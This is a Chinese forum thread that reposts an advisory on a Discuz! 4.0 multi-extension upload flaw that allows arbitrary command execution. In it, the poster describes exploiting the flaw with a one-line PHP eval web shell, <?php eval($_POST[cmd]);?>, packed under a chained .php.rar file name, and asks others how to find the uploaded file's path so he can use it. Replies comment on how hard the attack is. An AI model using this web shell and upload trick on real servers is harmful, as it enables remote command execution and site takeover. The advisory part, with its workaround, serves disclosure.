[转载]discuz附件文件下载路径获得以及多后缀RAR执行任意指令漏洞
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])Discuz! - "popular web forum applications in China".
Due to input validation flaw, malicious attackers can cause the Discuz program to run arbitrary commands with the privilege of the HTTPD process.
Credit:
The information has been provided by SSR Team.
Details
Vulnerable Systems:
* Discuz! version 4.0.0 rc4 and prior
Discuz! doesn't properly check multiple extensions of uploaded files, allowing malicious attackers to upload a file with multiple extensions such as attach.php.php.php.php.rar to a web server.
This can be exploited to run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user.
Workaround:
Exclude the RAR extension from the extension list for attached files on an administration page and wait the release of official patch.
Disclosure Timeline:
* 24.07.05 - Vulnerability found
* 25.07.05 - Vendor notified
* 12.08.05 - Official release
这是在[url]http://www.securiteam.com/unixfocus/5WP0F1FGKG.html[/url] 站点上看到的漏洞公告
自己马上在本地进行了测试,事实证明可以执行任意指令,用<?php eval($_POST[cmd]);?>
存为cmd.php再打包成p11.php.php.php.php.php.php.php.php.php.php.php.php.rar
上传到数据库,更名为p11.php.php.php.php.php.php.php.php.php.php.php.php_6nOXtmZPWv90.rar
可看出文件名已经修改,可是自己是看不到后面这个文件名的,也就没有路径自己。
抓包,嗅探都找不到文件路径,然后自己进后台,附件管理,可查看文件名,用lanker 马客户端
连接可执行命令,难点是如何的到上传文件路径,昨晚努力了很久,都无法获得路径
以前也来EST,就是经常潜水,现在好不容易有问题可以提出,本人菜鸟一个,在此求助帮忙
Vulnerable Systems:
* Discuz! version 4.0.0 rc4 and prior,漏洞非常之广,反盗链技术discuz又好
真的不是象我这样的菜鸟能搞定漏洞利用的,依然在研究代码中 [quote][b]下面是引用k4u于2005-08-19 14:26发表的[转载]discuz附件文件下载路径获得以及多后缀RAR执行任意指令漏洞:[/b]
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
Discuz! - "popular web forum applications in China".
Due to input validation flaw, malicious attackers can cause the Discuz program to run arbitrary commands with the privilege of the HTTPD process.
.......[/quote]
44444 这个漏洞太麻烦了,只有Httpd权限啊,累死你 这个似乎只有猜了
页:
[1]